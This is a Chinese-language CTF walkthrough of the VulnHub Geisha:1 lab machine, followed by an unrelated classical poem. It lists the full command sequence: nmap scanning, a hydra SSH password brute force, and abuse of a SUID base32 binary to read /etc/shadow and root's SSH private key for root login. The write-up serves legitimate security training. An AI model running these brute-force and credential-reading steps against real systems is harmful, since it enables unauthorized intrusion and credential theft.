vulnhub:Geisha:1 靶机练习
下载地址: https://www.vulnhub.com/entry/geisha-1,481/
目标是获得root shell,然后在/root下获得flag。
环境
kali linux + vmware 15.5.0
1、使用下面命令来发现靶机地址:
arp-scan -l
2、nmap扫描开放的端口,服务等信息
nmap -sS -A -O -p- -v 172.168.10.244
3、80端口是开着的,浏览一下页面:
利用
根据nmap的扫描结果,看到有22端口,ssh服务,试着看看能不能找到用户名和密码来通过ssh连接靶机。假如用户名是geisha,用hydra破解密码试试。
hydra -l geisha -P /usr/share/wordlists/rockyou.tx 172.168.10.244 ssh
为geisha用户得到了一个letmein的密码
尝试使用用户名geisha,密码letmein,登录,可以成功登录:
ssh geisha@172.168.10.244
当然不是root权限,现在开始提权操作,在当前目录中,先枚举并查看有哪些有价值的数据。这里有一些具有suid权限的文件。使用下面的命令,我们可以检查机器中的suid权限。
find / -perm -u=s -type f 2>/dev/null
此处发现/usr/bin/base32文件它有suid权限。通过使用base32文件来检查权限升级。
现在,使用/ base32命令检查/ etc / shadow文件以读取受限制的文件。
base32 "/etc/shadow" | base32 --decode
此处在/etc /shadow文件中获得了哈希密码,并尝试了多次破解,未成功,所以此方法无法获取root用户的密码。
现在尝试使用ssh进行root登录,为此,需要使用ssh复制登录的私钥。
通过使用以下命令,获得了root的ssh私钥。
base32 "/root/.ssh/id_rsa" | base32 --decode
在这里,成功得到了ssh密钥,现在将该密钥保存在自己的系统中。得到了root的ssh私钥。使用这个私有ssh密钥,把用户geisha切换到root。
ssh -i key root@172.168.10.244
获得flag:
查找root flag的另一种方法是,在geisha连接的ssh中输入如下语句,即可通过base32直接读取受限制的文件。(个人认为使用这种方法的前提是,知道flag在root家目录下,并且文件名称是flag.txt)
base32 "/root/flag.txt" | base32 --decode
天接云涛连晓雾,星河欲转千帆舞。
仿佛梦魂归帝所。闻天语,殷勤问我归何处。
我报路长嗟日暮,学诗谩有惊人句。
九万里风鹏正举。风休住,蓬舟吹取三山去!